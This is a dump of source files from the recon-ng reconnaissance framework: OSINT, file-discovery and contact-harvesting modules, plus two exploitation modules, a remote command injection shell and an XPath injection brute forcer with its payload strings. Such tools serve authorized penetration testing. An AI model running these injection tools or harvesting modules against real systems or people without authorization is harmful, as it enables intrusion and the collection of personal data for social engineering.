org.ve web.ve co.vi com.vi k12.vi net.vi org.vi ac.vn biz.vn com.vn edu.vn gov.vn health.vn info.vn int.vn name.vn net.vn org.vn pro.vn co.ye com.ye gov.ye ltd.ye me.ye net.ye org.ye plc.ye ac.yu co.yu edu.yu gov.yu org.yu ac.za agric.za alt.za bourse.za city.za co.za cybernet.za db.za ecape.school.za edu.za fs.school.za gov.za gp.school.za grondar.za iaccess.za imt.za inca.za kzn.school.za landesign.za law.za lp.school.za mil.za mpm.school.za ncape.school.za net.za ngo.za nis.za nom.za nw.school.za olivetti.za org.za pix.za school.za tm.za wcape.school.za web.za ac.zm co.zm com.zm edu.zm gov.zm net.zm org.zm sch.zm LaNMaSteR53-recon-ng-70d967e3f530/data/template_html.html000066400000000000000000000045731312265724400226230ustar00rootroot00000000000000 Recon-ng Reconnaissance Report
%s
Recon-ng Reconnaissance Report
www.recon-ng.com
%s

Created by: %s
%s

LaNMaSteR53-recon-ng-70d967e3f530/data/template_map.html000066400000000000000000000101651312265724400224260ustar00rootroot00000000000000 Pushpin - Map
LaNMaSteR53-recon-ng-70d967e3f530/data/template_media.html000066400000000000000000000056371312265724400227400ustar00rootroot00000000000000 Pushpin - Media
%s
LaNMaSteR53-recon-ng-70d967e3f530/modules/000077500000000000000000000000001312265724400176245ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/discovery/000077500000000000000000000000001312265724400216335ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/discovery/info_disclosure/000077500000000000000000000000001312265724400250225ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/discovery/info_disclosure/cache_snoop.py000066400000000000000000000025641312265724400276640ustar00rootroot00000000000000from recon.core.module import BaseModule import os import dns import re class Module(BaseModule): meta = { 'name': 'DNS Cache Snooper', 'author': 'thrapt (thrapt@gmail.com)', 'description': 'Uses the DNS cache snooping technique to check for visited domains', 'comments': ( 'Nameserver must be in IP form.', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html', ), 'options': ( ('nameserver', None, True, 'IP address of authoritative nameserver'), ('domains', os.path.join(BaseModule.data_path, 'av_domains.lst'), True, 'file containing the list of domains to snoop for'), ), } def module_run(self): nameserver = self.options['nameserver'] with open(self.options['domains']) as fp: domains = [x.strip() for x in fp.read().split()] for domain in domains: response = None # prepare our query query = dns.message.make_query(domain, dns.rdatatype.A, dns.rdataclass.IN) # unset the Recurse flag query.flags ^= dns.flags.RD response = dns.query.udp(query, nameserver) if len(response.answer) > 0: self.alert('%s => Snooped!' % (domain)) else: self.verbose('%s => Not Found.' % (domain)) LaNMaSteR53-recon-ng-70d967e3f530/modules/discovery/info_disclosure/interesting_files.py000066400000000000000000000075031312265724400311160ustar00rootroot00000000000000from recon.core.module import BaseModule import warnings import gzip from StringIO import StringIO class Module(BaseModule): meta = { 'name': 'Interesting File Finder', 'author': 'Tim Tomes (@LaNMaSteR53), thrapt (thrapt@gmail.com), Jay Turla (@shipcod3), and Mark Jeffery', 'description': 'Checks hosts for interesting files in predictable locations.', 'comments': ( 'Files: robots.txt, sitemap.xml, sitemap.xml.gz, crossdomain.xml, phpinfo.php, test.php, elmah.axd, server-status, jmx-console/, admin-console/, web-console/', 'Google Dorks:', '\tinurl:robots.txt ext:txt', '\tinurl:elmah.axd ext:axd intitle:"Error log for"', '\tinurl:server-status "Apache Status"', ), 'query': 'SELECT DISTINCT host FROM hosts WHERE host IS NOT NULL', 'options': ( ('download', True, True, 'download discovered files'), ('protocol', 'http', True, 'request protocol'), ('port', 80, True, 'request port'), ), } def uncompress(self, data_gz): inbuffer = StringIO(data_gz) data_ct = '' f = gzip.GzipFile(mode='rb', fileobj=inbuffer) try: data_ct = f.read() except IOError: pass f.close() return data_ct def module_run(self, hosts): download = self.options['download'] protocol = self.options['protocol'] port = self.options['port'] # ignore unicode warnings when trying to ungzip text type 200 repsonses warnings.simplefilter("ignore") # (filename, string to search for to prevent false positive) filetypes = [ ('robots.txt', 'user-agent:'), ('sitemap.xml', 'Apache Status<'), ('jmx-console/', 'JBoss'), #JBoss 5.1.0.GA ('admin-console/', 'index.seam'), #JBoss 5.1.0.GA ('web-console/', 'Administration'), #JBoss 5.1.0.GA ] cnt = 0 for host in hosts: for (filename, verify) in filetypes: url = '%s://%s:%d/%s' % (protocol, host, port, filename) try: resp = self.request(url, timeout=2, redirect=False) code = resp.status_code except KeyboardInterrupt: raise KeyboardInterrupt except: code = 'Error' if code == 200: # uncompress if necessary text = ('.gz' in filename and self.uncompress(resp.text)) or resp.text # check for file type since many custom 404s are returned as 200s if verify.lower() in text.lower(): self.alert('%s => %s. \'%s\' found!' % (url, code, filename)) # urls that end with '/' are not necessary to download if download and not filename.endswith("/"): filepath = '%s/%s_%s_%s' % (self.workspace, protocol, host, filename) dl = open(filepath, 'w') dl.write(resp.text.encode(resp.encoding) if resp.encoding else resp.text) dl.close() cnt += 1 else: self.output('%s => %s. \'%s\' found but unverified.' % (url, code, filename)) else: self.verbose('%s => %s' % (url, code)) self.output('%d interesting files found.' % (cnt)) if download: self.output('...downloaded to \'%s/\'' % (self.workspace)) LaNMaSteR53-recon-ng-70d967e3f530/modules/exploitation/000077500000000000000000000000001312265724400223435ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/exploitation/injection/000077500000000000000000000000001312265724400243255ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/exploitation/injection/command_injector.py000066400000000000000000000060661312265724400302220ustar00rootroot00000000000000from recon.core.module import BaseModule import urllib class Module(BaseModule): meta = { 'name': 'Remote Command Injection Shell Interface', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Provides a shell interface for remote command injection flaws in web applications.', 'options': ( ('base_url', None, True, 'the target resource url excluding any parameters'), ('parameters', None, True, 'the query parameters with \'\' signifying the value of the vulnerable parameter'), ('basic_user', None, False, 'username for basic authentication'), ('basic_pass', None, False, 'password for basic authentication'), ('cookie', None, False, 'cookie string containing authenticated session data'), ('post', False, True, 'set the request method to post. parameters should still be submitted in the url option'), ('mark_start', None, False, 'string to match page content preceding the command output'), ('mark_end', None, False, 'string to match page content following the command output'), ), } def help(self): return 'Type \'exit\' or \'ctrl-c\' to exit the shell.' def parse_params(self, params): params = params.split('&') params = [param.split('=') for param in params] return [(urllib.unquote_plus(param[0]), urllib.unquote_plus(param[1])) for param in params] def module_run(self): base_url = self.options['base_url'] base_params = self.options['parameters'] username = self.options['basic_user'] password = self.options['basic_pass'] cookie = self.options['cookie'] start = self.options['mark_start'] end = self.options['mark_end'] # process authentication auth = (username, password) if username and password else () headers = {'Cookie': cookie} if cookie else {} # set the request method method = 'POST' if self.options['post'] else 'GET' print('Type \'help\' or \'?\' for assistance.') while True: # get command from the terminal cmd = raw_input("cmd> ") if cmd.lower() == 'exit': return elif cmd.lower() in ['help', '?']: print(self.help()) continue # build the payload from the base_params string payload = {} params = self.parse_params(base_params.replace('', cmd)) for param in params: payload[param[0]] = param[1] # send the request resp = self.request(base_url, method=method, payload=payload, headers=headers, auth=auth) # process the response output = resp.text if start and end: try: output = output[output.index(start)+len(start):] except ValueError: self.error('Invalid start marker.') try: output = output[:output.index(end)] except ValueError: self.error('Invalid end marker.') print('%s' % (output.strip())) LaNMaSteR53-recon-ng-70d967e3f530/modules/exploitation/injection/xpath_bruter.py000066400000000000000000000151431312265724400274120ustar00rootroot00000000000000from __future__ import print_function from recon.core.module import BaseModule import urllib import sys class Module(BaseModule): meta = { 'name': 'Xpath Injection Brute Forcer', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Exploits XPath injection flaws to enumerate the contents of serverside XML documents.', 'options': ( ('base_url', None, True, 'target resource url excluding any parameters'), ('basic_user', None, False, 'username for basic authentication'), ('basic_pass', None, False, 'password for basic authentication'), ('cookie', None, False, 'cookie string containing authenticated session data'), ('parameters', None, True, 'query parameters with \'\' signifying the injection'), ('post', False, True, 'set the request method to post. parameters should still be submitted in the url option'), ('string', None, True, 'unique string found when the injection results in \'True\''), ), } def getRequest(self, strTest): payload = {} for param in self.lstParams: payload[param[0]] = param[1].replace('', strTest) # send the request resp = self.request(self.strUrl, method=self.strMethod, payload=payload, headers=self.dictHeaders, auth=self.tupAuth) # process the response self.intCount += 1 if self.strSearch in resp.text: return True else: return False def getLength(self, strTest): intLength = 0 for x in range(0,10000): if self.getRequest(strTest % (x)): return x def getString(self, intLength, strTest): strResult = '' for x in range(1,intLength+1): found = False for char in self.strCharset: if self.getRequest(strTest % (x, char)): strResult += char print(char, end='') found = True break if not found: strResult += '?' print('?', end='') return strResult def checkItem(self, strItem, lstItems): for item in getattr(self, lstItems): if self.getRequest("' and name(%s)='%s" % (strItem, item)): return item def getAttribs(self, node): intAttribs = self.getLength("' and count(%s/@*)=%%d and '1'='1" % (node)) for x in range(1,intAttribs+1): strAttrib = '%s/@*[%d]' % (node, x) print(' ', end='') # check if attrib matches previously enumerated attrib name = self.checkItem(strAttrib, 'attribs') if name: print(name, end='') else: # length of attrib name intNamelen = self.getLength("' and string-length(name(%s))=%%d and '1'='1" % (strAttrib)) # attrib name name = self.getString(intNamelen, "' and substring(name(%s),%%d,1)='%%s' and '1'='1" % (strAttrib)) self.attribs.append(name) # length of attrib value intValuelen = self.getLength("' and string-length(%s)=%%d and '1'='1" % (strAttrib)) # attrib value print('="', end='') value = self.getString(intValuelen, "' and substring(%s,%%d,1)='%%s' and '1'='1" % (strAttrib)) print('"', end='') def getXML(self, node='', name='', level=0): spacer = ' '*level intNodes = self.getLength("' and count(%s/*)=%%d and '1'='1" % (node)) if not intNodes: # check for value intValuelen = self.getLength("' and string-length(%s)=%%d and '1'='1" % (node)) if intValuelen: print('>', end='') value = self.getString(intValuelen, "' and substring(%s,%%d,1)='%%s' and '1'='1" % (node)) print('' % (name)) else: print('/>') return True if level != 0: print('>') for x in range(1,intNodes+1): strNode = '%s/*[%d]' % (node, x) print('%s<' % (spacer), end='') # check if node matches previously enumerated node name = self.checkItem(strNode, 'nodes') if name: print(name, end='') else: # length of node name intNamelen = self.getLength("' and string-length(name(%s))=%%d and '1'='1" % (strNode)) # node name name = self.getString(intNamelen, "' and substring(name(%s),%%d,1)='%%s' and '1'='1" % (strNode)) self.nodes.append(name) self.getAttribs(strNode) if not self.getXML(strNode, name, level + 1): print('%s' % (spacer, name)) def module_run(self): self.strSearch = self.options['string'] self.strUrl = self.options['base_url'] #self.strCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' self.strCharset = 'aeorisn1tl2md0cp3hbuk45g9687yfwjvzxqASERBTMLNPOIDCHGKFJUW.!Y*@V-ZQX_$#,/+?;^ %~=&`\)][:<(>"|{\'}' self.intCount = 0 self.nodes = [] self.attribs = [] strTrue = "' and '1'='1" strFalse = "' and '1'='2" # process parameters params = self.options['parameters'] params = params.split('&') params = [param.split('=') for param in params] self.lstParams = [(urllib.unquote_plus(param[0]), urllib.unquote_plus(param[1])) for param in params] # process basic authentication username = self.options['basic_user'] password = self.options['basic_pass'] self.tupAuth = (username, password) if username and password else () # process cookie authentication cookie = self.options['cookie'] self.dictHeaders = {'Cookie': cookie} if cookie else {} # set the request method self.strMethod = 'POST' if self.options['post'] else 'GET' self.verbose("'True' injection payload: =>%s<=" % (strTrue)) if self.getRequest(strTrue): self.alert("'True' injection test passed.") else: self.error("'True' injection test failed.") return self.verbose("'False' injection payload: =>%s<=" % (strFalse)) if not self.getRequest(strFalse): self.alert("'False' injection test passed.") else: self.error("'False' injection test failed.") return self.output('Fetching XML...') self.getXML() self.output('%d total queries made.' % (self.intCount)) LaNMaSteR53-recon-ng-70d967e3f530/modules/import/000077500000000000000000000000001312265724400211365ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/import/csv_file.py000066400000000000000000000165601312265724400233120ustar00rootroot00000000000000from recon.core.module import BaseModule import csv class Module(BaseModule): meta = { 'name': 'Advanced CSV File Importer', 'author': 'Ethan Robish (@EthanRobish)', 'description': 'Imports values from a CSV file into a database table.', 'comments': ( 'Only a few options are available until a valid filename is set. Then, the file is analyzed and more options become available for configuring where each CSV entry is imported.', 'This module is very powerful and can seriously pollute a database. Backing up the database before importing is encouraged.', ), 'options': ( ('filename', None, True, 'path and filename for csv input'), ('column_separator', ',', True, 'character that separates each column value'), ('quote_character', '', False, 'character that surrounds each column value'), ('has_header', True, True, 'whether or not the first row in the csv file should be interpreted as column names'), ('table', None, True, 'table to import the csv values'), ), } def __init__(self, *args, **kwargs): result = BaseModule.__init__(self, *args, **kwargs) # stores the values read from the CSV file self.__values = [] # keeps track of which module options correspond to which CSV column index self.__csv_indices = {} # account for the fact that module options are stored and preloaded from a config file self.__init_options() return result def do_set(self, *args, **kwargs): BaseModule.do_set(self, *args, **kwargs) self.__init_options() def module_run(self): if not self.__values or len(self.__values) == 0: return has_header = self.options['has_header'] # stores the database column names to be imported # initialize it to a list the size of a row all_column_names = [None] * len(self.__values[0]) for option in self.options: if option.startswith('csv_'): index = self.__csv_indices[option] all_column_names[index] = self.options[option] # e.g. all_column_names = [None, 'fname', 'lname', None, 'title'] # ensure that at least one column name is populated if not any(all_column_names): self.error('You must set at least one column name to import.') return # build the query based on which column options have been set table = self.options['table'] used_column_names = [] used_column_indices = [] for index, name in enumerate(all_column_names): if name: used_column_names.append(name) used_column_indices.append(index) # e.g. used_column_names = ['fname', 'lname', 'title'] # e.g. used_column_indices = [1, 2, 4] for row in self.__values[(1 if has_header else 0):]: # creates a dictionary where the keys are the column names and the values are the column values from row data = dict( zip( used_column_names, map(row.__getitem__, used_column_indices) ) ) # e.g. data = {'fname':'John', 'lname':'Doe', 'title':'CEO'} self.verbose('Inserting %s' % ' '.join([data[col] for col in used_column_names])) if not self.insert(table, data): self.error('There was a problem inserting the previous row into the database. Please check your settings.') return def __init_options(self): if not self.__validate_options(): return # repopulate the module's options try: self.__values = self.__parse_file() except IOError: self.error('\'%s\' could not be opened. The file may not exist.' % self.options['filename']) except AssertionError: self.error('The number of columns in each row is inconsistent. Try checking the input file, changing the column separator, or changing the quote character.') else: self.__register_options() def __validate_options(self): # begins with an underscore so as not to conflict with the parent class's validate_options method filename = self.options['filename'] sep = self.options['column_separator'] quote = self.options['quote_character'] if not filename: # there is currently no valid file so remove all the options file-specific options self.__values = [] self.__register_options() return False if not sep or len(sep) != 1: self.error('COLUMN_SEPARATOR is required and must only contain one character.') # there is currently no valid separator so remove all the options file-specific options self.__values = [] self.__register_options() return False if quote and len(quote) > 1: self.error('QUOTE_CHARACTER is optional but must not contain more than one character.') # there is currently no valid quote so remove all the options file-specific options self.__values = [] self.__register_options() return False return True def __parse_file(self): filename = self.options['filename'] if not filename: raise IOError sep = self.options['column_separator'] quote = self.options['quote_character'] values = [] with open(filename, 'rU') as infile: # if sep is not a one character string, csv.reader will raise a TypeError if not quote: csvreader = csv.reader(infile, delimiter=str(sep), quoting=csv.QUOTE_NONE) else: csvreader = csv.reader(infile, delimiter=str(sep), quotechar=str(quote)) # get each line from the file and separate it into columns based on sep for row in csvreader: # append all lines as-is case-wise # unicode(str, errors='ignore') causes all invalid characters to be stripped out values.append([unicode(value.strip(), errors='ignore') for value in row]) # ensure the number of columns in each row is the same as the previous row if len(values) > 1: assert len(values[-1]) == len(values[-2]) return values def __register_options(self): # remove any old csv-file options options = self.options.keys() for option in options: if option.startswith('csv_'): del self.options[option] # if there are no values, then there is nothing left to do if not self.__values or len(self.__values) == 0: return # add the new options has_header = self.options['has_header'] for i, header in enumerate(self.__values[0]): prefix = 'csv_' if has_header: # TODO: use translate to map any bad characters to _ option_name = prefix + header.replace(' ', '_').lower() else: option_name = prefix + str(i) # save the mapping of option name to column index self.__csv_indices[option_name] = i self.register_option(option_name, None, False, 'database column name where this csv column will be imported') LaNMaSteR53-recon-ng-70d967e3f530/modules/import/list.py000066400000000000000000000020371312265724400224650ustar00rootroot00000000000000from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'List File Importer', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Imports values from a list file into a database table and column.', 'options': ( ('filename', None, True, 'path and filename for list input'), ('table', None, True, 'table to import the list values'), ('column', None, True, 'column to import the list values'), ), } def module_run(self): cnt = 0 with open(self.options['filename']) as fh: lines = fh.read().split() method = 'add_'+self.options['table'].lower() if not hasattr(self, method): self.error('No such table: %s' % (options['table'])) return func = getattr(self, method) for line in lines: self.output(line) kwargs = {self.options['column']: line} cnt += func(**kwargs) self.output('%d new records added.' % cnt) LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/000077500000000000000000000000001312265724400207325ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-contacts/000077500000000000000000000000001312265724400245245ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-contacts/bing_linkedin_cache.py000066400000000000000000000135051312265724400310210ustar00rootroot00000000000000from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Bing Cache Linkedin Profile and Contact Harvester', 'author':'Joe Black (@MyChickenNinja), @fullmetalcache, and Brian King', 'description': 'Harvests profiles from LinkedIn by querying the Bing API cache for LinkedIn pages related to the given companies, and adds them to the \'profiles\' table. The module will then parse the resulting information to extract the user\'s full name and job title (title parsing recently improved). The user\'s full name and title are then added to the \'contacts\' table. This module does not access LinkedIn at any time.', 'required_keys': ['bing_api'], 'comments': ( 'Be sure to set the \'SUBDOMAINS\' option to the region your target is located in.', 'You will get better results if you use more subdomains other than just \'www\'.', 'Multiple subdomains can be provided in a comma separated list.', 'Results will include historical associations, not just current employees.', ), 'query': 'SELECT DISTINCT company FROM companies WHERE company IS NOT NULL', 'options': ( ('limit', 0, True, 'limit total number of pages per api request (0 = unlimited)'), ('subdomains', None, False, 'subdomain(s) to search on LinkedIn: www, ca, uk, etc.'), ), } def module_run(self, companies): for company in companies: self.heading(company, level=0) self.get_profiles(company) if " " in company: company = company.replace(" ", "") self.get_profiles(company) def get_profiles(self, company): results = [] subdomains = self.options['subdomains'] subdomain_list = [''] if not subdomains else [x.strip()+'.' for x in subdomains.split(',')] for subdomain in subdomain_list: base_query = [ "site:\"%slinkedin.com/in/\" \"%s\"" % (subdomain, company), "site:\"%slinkedin.com\" -jobs \"%s\"" % (subdomain, company), ] for query in base_query: results = self.search_bing_api(query, self.options['limit']) for result in results: name = result['name'] url = result['displayUrl'] snippet = result['snippet'] username = self.parse_username(url) cache = (name,snippet,url,company) self.get_contact_info(cache) def parse_username(self, url): username = None username = url.split("/")[-1] return username def get_contact_info(self, cache): (name, snippet, url, company) = cache fullname, fname, mname, lname = self.parse_fullname(name) if fname is None or 'LinkedIn' in fullname or 'profiles' in name.lower() or re.search('^\d+$',fname): # if 'name' has these, it's not a person. pass elif u'\u2013' in snippet: # unicode hyphen between dates here usually means no longer at company. # Not always, but nothing available seems more consistent than that. pass else: username = self.parse_username(url) jobtitle = self.parse_jobtitle(company, snippet) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title=jobtitle) self.add_profiles(username=username, url=url, resource='LinkedIn', category='social') def parse_fullname(self, name): fullname = name.split(" |")[0] fullname = fullname.split(",")[0] fname, mname, lname = self.parse_name(fullname) return fullname, fname, mname, lname def parse_jobtitle(self, company, snippet): # sample 'snippet' strings with titles. (all contain this string: ' at ') # "John Doe. Director of QA at companyname. Location New York, New York Industry Electrical/Electronic Manufacturing" # "View John Doe\u2019s professional profile on LinkedIn. ... New Products Curator at companyname. Jane Doe. Sales Operations Analyst at othercompany", # sample 'snippet' strings that are troublemakers # View John Doe\u2019s professional profile on ... children will have jobs. ... Security Researcher and Consultant at companyname. Jack ..." # sample 'snippet' strings with *no* titles. (none contain this string: ' at ') # "View John Doe\u2019s professional profile on LinkedIn. LinkedIn is the world's largest business network, helping professionals like John Doe ...", # "View John Doe\u2019s professional profile on LinkedIn. ... companyname; Education: Carnegie Mellon University; 130 connections. View John\u2019s full profile." # outliers (contain a title, but we don't detect it) # Jane Doe. cfo, acompanyname. Location Greater New York City Area Industry Electrical/Electronic Manufacturing" company = company[:5].lower() # if no variant of company name in snippet, then no title. jobtitle = 'Undetermined' # default if no title found chunks = snippet.split('...') # if more than one '...' then no title or can't predict where it is if ' at ' in snippet and not 'See who you know' in snippet and company in snippet.lower() and len(chunks) < 3: if re.search('^View ', snippet): # here we want the string after " ... " and before " at " m = re.search('\.{3} (?P.+?) at ', snippet) else: # here we want the string after "^$employeename. " and before " at " m = re.search('^[^.]+. (?P<title>.+?) at ', snippet) try: jobtitle = m.group('title') except AttributeError: pass return jobtitle �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-contacts/jigsaw/��������������������������0000775�0000000�0000000�00000000000�13122657244�0026010�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-contacts/jigsaw/point_usage.py������������0000664�0000000�0000000�00000001727�13122657244�0030706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'Jigsaw - Point Usage Statistics Fetcher', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the Jigsaw API for the point usage statistics of the given account.', 'required_keys': ['jigsaw_username', 'jigsaw_password', 'jigsaw_api'], } def module_run(self): username = self.keys.get('jigsaw_username') password = self.keys.get('jigsaw_password') key = self.keys.get('jigsaw_api') url = 'https://www.jigsaw.com/rest/user.json' payload = {'token': key, 'username': username, 'password': password} resp = self.request(url, payload=payload, redirect=False) if resp.json: jsonobj = resp.json else: self.error('Invalid JSON response.\n%s' % (resp.text)) return # handle output self.output('%d Jigsaw points remaining.' % (jsonobj['points'])) �����������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-contacts/jigsaw/purchase_contact.py�������0000664�0000000�0000000�00000003135�13122657244�0031711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import time class Module(BaseModule): meta = { 'name': 'Jigsaw - Single Contact Retriever', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Retrieves a single complete contact from the Jigsaw.com API using points from the given account.', 'required_keys': ['jigsaw_username', 'jigsaw_password', 'jigsaw_api'], 'comments': ( 'Account Point Cost: 5 points per request.', 'This module is typically used to validate email address naming conventions and gather alternative social engineering information.', ), 'options': ( ('contact', None, True, 'jigsaw contact id'), ), } def module_run(self): username = self.keys.get('jigsaw_username') password = self.keys.get('jigsaw_password') key = self.keys.get('jigsaw_api') url = 'https://www.jigsaw.com/rest/contacts/%s.json' % (self.options['contact']) payload = {'token': key, 'username': username, 'password': password, 'purchaseFlag': 'true'} resp = self.request(url, payload=payload, redirect=False) if resp.json: jsonobj = resp.json else: self.error('Invalid JSON response.\n%s' % (resp.text)) return # handle output contacts = jsonobj['contacts'] header = ['Item', 'Info'] for contact in contacts: tdata = [] for key in contact: tdata.append((key.title(), contact[key])) self.table(tdata, header=header, title='Jigsaw %s' % (contact['contactId'])) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-contacts/jigsaw/search_contacts.py��������0000664�0000000�0000000�00000011172�13122657244�0031527�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.utils.requests import encode_payload import urllib import time class Module(BaseModule): meta = { 'name': 'Jigsaw Contact Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Harvests contacts from the Jigsaw.com API. Updates the \'contacts\' table with the results.', 'required_keys': ['jigsaw_api'], 'query': 'SELECT DISTINCT company FROM companies WHERE company IS NOT NULL', 'options': ( ('keywords', None, False, 'additional keywords to identify company'), ), } def module_run(self, companies): self.api_key = self.keys.get('jigsaw_api') for company in companies: company_id = self.get_company_id(company) if company_id: self.get_contacts(company_id) else: time.sleep(.25) def get_company_id(self, company_name): self.heading(company_name, level=0) keywords = self.options['keywords'] all_companies = [] cnt = 0 size = 50 params = ' '.join([x for x in [company_name, keywords] if x]) url = 'https://www.jigsaw.com/rest/searchCompany.json' #while True: payload = {'token': self.api_key, 'name': params, 'offset': cnt, 'pageSize': size} self.verbose('Query: %s?%s' % (url, encode_payload(payload))) resp = self.request(url, payload=payload, redirect=False) jsonobj = resp.json if jsonobj['totalHits'] == 0: self.output('No company matches found.') return else: companies = jsonobj['companies'] for company in companies: if company['activeContacts'] > 0: location = '%s, %s, %s' % (company['city'], company['state'], company['country']) all_companies.append((company['companyId'], company['name'], company['activeContacts'], location)) #cnt += size #if cnt > jsonobj['totalHits']: break # jigsaw rate limits requests per second to the api #time.sleep(.25) if len(all_companies) == 0: self.output('No contacts available for companies matching \'%s\'.' % (company_name)) return if len(all_companies) == 1: company_id = all_companies[0][0] company_name = all_companies[0][1] contact_cnt = all_companies[0][2] self.output('Unique company match found: [%s - %s (%s contacts)]' % (company_name, company_id, contact_cnt)) return company_id id_len = len(max([str(x[0]) for x in all_companies], key=len)) for company in all_companies: self.output('[%s] %s - %s (%s contacts)' % (str(company[0]).ljust(id_len), company[1], company[3], company[2])) company_id = raw_input('Enter Company ID from list [%s - %s]: ' % (all_companies[0][1], all_companies[0][0])) if not company_id: company_id = all_companies[0][0] return company_id def get_contacts(self, company_id): self.output('Gathering contacts...') cnt = 0 size = 100 url = 'https://www.jigsaw.com/rest/searchContact.json' while True: payload = {'token': self.api_key, 'companyId': company_id, 'offset': cnt, 'pageSize': size} resp = self.request(url, payload=payload, redirect=False) jsonobj = resp.json for contact in jsonobj['contacts']: contact_id = contact['contactId'] fname = self.html_unescape(contact['firstname']) # fname includes the preferred name as an element that needs to be removed fname = ' '.join(fname.split()[:2]) if len(fname.split()) > 2 else fname lname = self.html_unescape(contact['lastname']) name = '%s %s' % (fname, lname) fname, mname, lname = self.parse_name(name) title = self.html_unescape(contact['title']) city = self.html_unescape(contact['city']).title() state = self.html_unescape(contact['state']).upper() region = [] for item in [city, state]: if item: region.append(item) region = ', '.join(region) country = self.html_unescape(contact['country']).title() self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title=title, region=region, country=country) cnt += size if cnt > jsonobj['totalHits']: break # jigsaw rate limits requests per second to the api time.sleep(.25) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-contacts/linkedin_auth.py�����������������0000664�0000000�0000000�00000006221�13122657244�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'LinkedIn Authenticated Contact Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Harvests contacts from the LinkedIn.com API using an authenticated connections network. Updates the \'contacts\' table with the results.', 'required_keys': ['linkedin_api', 'linkedin_secret'], 'query': 'SELECT DISTINCT company FROM companies WHERE company IS NOT NULL', } def get_linkedin_access_token(self): return self.get_explicit_oauth_token( 'linkedin', 'r_basicprofile r_network', 'https://www.linkedin.com/uas/oauth2/authorization', 'https://www.linkedin.com/uas/oauth2/accessToken' ) def module_run(self, companies): access_token = self.get_linkedin_access_token() if access_token is None: return count = 25 url = 'https://api.linkedin.com/v1/people-search:(people:(id,first-name,last-name,headline,location:(name,country:(code))))' for company in companies: self.heading(company, level=0) payload = {'format': 'json', 'company-name': company, 'current-company': 'true', 'count': count, 'oauth2_access_token': access_token} page = 1 while True: resp = self.request(url, payload=payload) jsonobj = resp.json # check for an erroneous request if 'errorCode' in jsonobj: # check for an expired access token if jsonobj['status'] == 401: # renew token self.delete_key('linkedin_token') payload['oauth2_access_token'] = self.get_linkedin_access_token() continue self.error(jsonobj['message']) break if not 'values' in jsonobj['people']: break for contact in jsonobj['people']['values']: # the headline field does not exist when a connection is private # only public connections can be harvested beyond the 1st degree if 'headline' in contact: fname = self.html_unescape(re.split('[\s]',contact['firstName'])[0]) lname = self.html_unescape(re.split('[,;]',contact['lastName'])[0]) title = self.html_unescape(contact['headline']) region = re.sub('(?:Greater\s|\sArea)', '', self.html_unescape(contact['location']['name']).title()) country = self.html_unescape(contact['location']['country']['code']).upper() self.add_contacts(first_name=fname, last_name=lname, title=title, region=region, country=country) if not '_start' in jsonobj['people']: break if jsonobj['people']['_start'] + jsonobj['people']['_count'] == jsonobj['people']['_total']: break payload['start'] = page * jsonobj['people']['_count'] page += 1 